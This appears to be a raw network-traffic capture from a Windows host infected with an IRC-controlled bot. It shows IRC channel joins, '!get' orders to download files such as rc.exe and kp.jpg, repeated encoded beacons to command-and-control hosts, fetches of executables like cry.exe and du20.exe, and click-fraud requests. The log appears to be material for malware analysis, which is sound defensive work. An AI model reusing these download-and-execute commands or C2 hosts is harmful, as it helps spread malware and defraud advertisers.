Server: PONG :k.; Client: JOIN &virtu; Server: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869CEDCE5CA9D5FE6F6CADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.2015497 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache


VICTIM:  	GET /sn.php?c=6779B6521787FC2C627E68595D13589A09917C46425C844E2E195124379182A9DCA59479CBA6F7AB2F45BE201C20D43D69A0DE6891E13513432199EECBB6891681CF6F1AD80EF46BC9F33F45AA44F12EB5420E33C8B63C3A2785046944BDEF6BDD85B797EDC0EB5B45F6AC2BC5C579E392651B34B6F031160F56F39C80361BA5B3BA1EB5F6C515D4F6C706576AAE75F5&t=0.3770105 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=6779B6521787FC2C627E68595D13589A09917C46425C844E2E195124379182A9DCA59479CBA6F7AB2F45BE201C20D43D69A0DE6891E13513432199EECBB6891681CF6F1AD80EF46BC9F33F45AA44F12EB5420E33C8B63C3A2785046944BDEF6BDD85B797EDC0EB5B45F6AC2BC5C579E392651B34B6F031160F56F39C80361BA5B3BA1EB5F6C515D4F6C706576AAE75F5&t=0.3770105 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-FA-9F-DF&Publicer=bigbuy HTTP/1.1Host: a.95622.comUser-Agent: ClickAdsByIE 0.7.5Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: zh-cn,zh;q=0.5Referer: http:/a.95622.com/p6.aspContent-Type: application/x-www-form-urlencodedConnection: Close 
ATTACKER:	PING :k. 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /sn.php?c=6779B6521787FC2C627E68595D13589A09917C46425C844E2E195124379182A9DCA59479CBA6F7AB2F45BE201C20D43D69A0DE6891E13513432199EECBB6891681CF6F1AD80EF46BC9F33F45AA44F12EB5420E33C8B63C3A2785046944BDEF6BDD85B797EDC0EB5B45F6AC2BC5C579E392651B34B6F031160F56F39C80361BA5B3BA1EB5F6C515D4F6C706576AAE75F5&t=0.3770105 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-FA-9F-DF&Publicer=bigbuy HTTP/1.1Host: a.95622.comUser-Agent: ClickAdsByIE 0.7.5Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: zh-cn,zh;q=0.5Referer: http:/a.95622.com/p6.aspContent-Type: application/x-www-form-urlencodedConnection: Close 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869CEDCE5CA9D5FE6F6CADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=6.519717E-02 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: exe4.perfectexe.com:666Connection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869CEDCE5CA9D5FE6F6CADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.2015497 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	NICK yuamvxggUSER a020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG yuamvxgg :!get http:/ii.derquda.com/rc.exe:u. PRIVMSG yuamvxgg :!get http:/lb.perfectexe.com:88/kp.jpg:u. PRIVMSG yuamvxgg :!get http:/www.derquda.com/md12.txt 
ATTACKER:	GET /upload/int.exe?t=0.8620722 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 91.204.48.97Connection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /kp.jpg HTTP/1.0User-Agent: DownloadHost: lb.perfectexe.com:88Pragma: no-cache 
ATTACKER:	GET /sn.php?c=0B15FA1E77E70FDF4B5000315A14CE3E1BD2AB9E4110A0684C745F1E9148AA8083CDF8E048244071D5E20D60320C4BA0945371C460C2EEBF685B00A7D67F69F5A1DC98E284513DA2CBF1651F7896904F8374625F512FD4D28A281C71F70EA4201840B99989A4EE5E73C03ABD979757CDBF48FDD292D5DBFC184186E98036B40ADED87EDAF4DB7EB65064FCA83EFE98E7&t=0.3813593 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /md12.txt HTTP/1.0User-Agent: DownloadHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /sn.php?c=F7E97D995ACA69B978630938CD830AFAEE27DBEEF4A5FB331F277938CC159FB5F8B6E6FEDCB0A998695E2449B08EC82376B1F643892B8ADB8CBFEA4D53FA7AE6116C97EDD7028C133E04245E32DCBC6331C6093486F8F1F73E9C1A77EF1627A387DFC1E1B994CD7DCC7F8B1DD0296CE48471E6B877248ABB2C38285D3D9FCE34DFCFD47D2D1E64A3271F194E4687A3DF12CD&t=0.7014276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=F7E97D995ACA69B978630938CD830AFAEE27DBEEF4A5FB331F277938CC159FB5F8B6E6FEDCB0A998695E2449B08EC82376B1F643892B8ADB8CBFEA4D53FA7AE6116C97EDD7028C133E04245E32DCBC6331C6093486F8F1F73E9C1A77EF1627A387DFC1E1B994CD7DCC7F8B1DD0296CE48471E6B877248ABB2C38285D3D9FCE34DFCFD47D2D1E64A3271F194E4687A3DF12CD&t=0.7014276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=F7E97D995ACA69B978630938CD830AFAEE27DBEEF4A5FB331F277938CC159FB5F8B6E6FEDCB0A998695E2449B08EC82376B1F643892B8ADB8CBFEA4D53FA7AE6116C97EDD7028C133E04245E32DCBC6331C6093486F8F1F73E9C1A77EF1627A387DFC1E1B994CD7DCC7F8B1DD0296CE48471E6B877248ABB2C38285D3D9FCE34DFCFD47D2D1E64A3271F194E4687A3DF12CD&t=0.7014276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=F7E97D995ACA69B978630938CD830AFAEE27DBEEF4A5FB331F277938CC159FB5F8B6E6FEDCB0A998695E2449B08EC82376B1F643892B8ADB8CBFEA4D53FA7AE6116C97EDD7028C133E04245E32DCBC6331C6093486F8F1F73E9C1A77EF1627A387DFC1E1B994CD7DCC7F8B1DD0296CE48471E6B877248ABB2C38285D3D9FCE34DFCFD47D2D1E64A3271F194E4687A3DF12CD&t=0.7014276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /sn.php?c=F7E97D995ACA69B978630938CD830AFAEE27DBEEF4A5FB331F277938CC159FB5F8B6E6FEDCB0A998695E2449B08EC82376B1F643892B8ADB8CBFEA4D53FA7AE6116C97EDD7028C133E04245E32DCBC6331C6093486F8F1F73E9C1A77EF1627A387DFC1E1B994CD7DCC7F8B1DD0296CE48471E6B877248ABB2C38285D3D9FCE34DFCFD47D2D1E64A3271F194E4687A3DF12CD&t=0.7014276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=F7E97D995ACA69B978630938CD830AFAEE27DBEEF4A5FB331F277938CC159FB5F8B6E6FEDCB0A998695E2449B08EC82376B1F643892B8ADB8CBFEA4D53FA7AE6116C97EDD7028C133E04245E32DCBC6331C6093486F8F1F73E9C1A77EF1627A387DFC1E1B994CD7DCC7F8B1DD0296CE48471E6B877248ABB2C38285D3D9FCE34DFCFD47D2D1E64A3271F194E4687A3DF12CD&t=0.7014276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=F7E97D995ACA69B978630938CD830AFAEE27DBEEF4A5FB331F277938CC159FB5F8B6E6FEDCB0A998695E2449B08EC82376B1F643892B8ADB8CBFEA4D53FA7AE6116C97EDD7028C133E04245E32DCBC6331C6093486F8F1F73E9C1A77EF1627A387DFC1E1B994CD7DCC7F8B1DD0296CE48471E6B877248ABB2C38285D3D9FCE34DFCFD47D2D1E64A3271F194E4687A3DF12CD&t=0.7014276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /tm/cry.exe?t=0.3238184 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: www.derquda.comConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=322C46A2D848A673DD3AC1ED2A64A1555ACD43240022509AF9CEA6D456F8113BACFDE600C8895F021821E47F4A46AEB9EC1B63DB19BB96B6721257FDF189345E63185F288151CE51003A90EA1CF2B56A5EA97449B1CF707602A0523FFD041692ADF5B090FFD2FC4C79CA1790ADAD900A25D21639E5A285A2AEF789E6A610318F1F181BB380B433F7A99C0A5A498858D8&t=0.6862451 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /sn.php?c=322C46A2D848A673DD3AC1ED2A64A1555ACD43240022509AF9CEA6D456F8113BACFDE600C8895F021821E47F4A46AEB9EC1B63DB19BB96B6721257FDF189345E63185F288151CE51003A90EA1CF2B56A5EA97449B1CF707602A0523FFD041692ADF5B090FFD2FC4C79CA1790ADAD900A25D21639E5A285A2AEF789E6A610318F1F181BB380B433F7A99C0A5A498858D8&t=0.6862451 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=99872FCBE373D4018A6DBC9057195DA978EF93F42D0F0CC61A2DDFADF25C08228ADBA442A6E71D40F6CFA53E1519BBAC986F853D64C64262E8882C86EB937C16106B6C1B42926BF4A09AE59F9F7146998374261B5F21BEB831931479E21B8501277F90B09CB111A1942754C269909D1556A31E4021727240243011646DCF649E0D1D58FCD9EB9F5921170C552AE2A4266EB3&t=0.2651026 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=99872FCBE373D4018A6DBC9057195DA978EF93F42D0F0CC61A2DDFADF25C08228ADBA442A6E71D40F6CFA53E1519BBAC986F853D64C64262E8882C86EB937C16106B6C1B42926BF4A09AE59F9F7146998374261B5F21BEB831931479E21B8501277F90B09CB111A1942754C269909D1556A31E4021727240243011646DCF649E0D1D58FCD9EB9F5921170C552AE2A4266EB3&t=0.2651026 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /du20.exe?t=4.606265E-02 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 68.169.45.207Connection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=E1FF7692B32376D16B86BE935F1420E3A06BCAF87F303AF2271FEEAC20F9673EADD17B97670B0C5191F99BEBE1E853B9E02B7C9714B4762583E2B1C55AF13A4BB7C9D57DEFEFB926BE84710B48A665BAD4231F22A6D84A4C65C7F09DEC1593177D250C2CAD8050E08033981F8A8A77ED1BECDDF2BBFC280F7A23A6C9EB5D358BBCB5E94A497AE123A495AAFADC19E86C&t=0.5637628 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /sn.php?c=657B3DD9A1311FB859B47A57DC97D417418AEEDC410EA860033B33710ED7AAF3FD81816DACC07429F69ED3A33F366882559E45AE7BDB396A91F0C1B5B912ADDCE997DA724A4AA23D556FF8820BE54F90BC4BB68B3947CDCB67C588E5877ED652B6EEA1816E43CC7C12A11482C53CFD7522D7396791C22517425652271EBC34CE31216EC24F7A5292093A8ED732F5215A75A9&t=0.425091 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /i103.jpg?t=0.6885187 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 109.196.134.25Connection: Keep-AliveCache-Control: no-cache 
ATTACKER:	GET /sn.php?c=C9D76185B0202EFE607CF8C91D53985A57CFB983233DEA20744366134DEB153E39408A67CDA0114D09630A94C2FE18F18B42FD4BB6C613355331BDCA6B1651CEC08E3E4BD7017FE0201A9FE56D83D50A1BECFFC29EE08D8B4EEC92FFA059991D366EF4D46E43952550E3BD3A1010FB617E89557A1C5B96B1ADF409667DCB3987B5BE5FF97341B07680B2A7F1DB12F78C&t=0.3263361 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AliveCache-Control: no-cache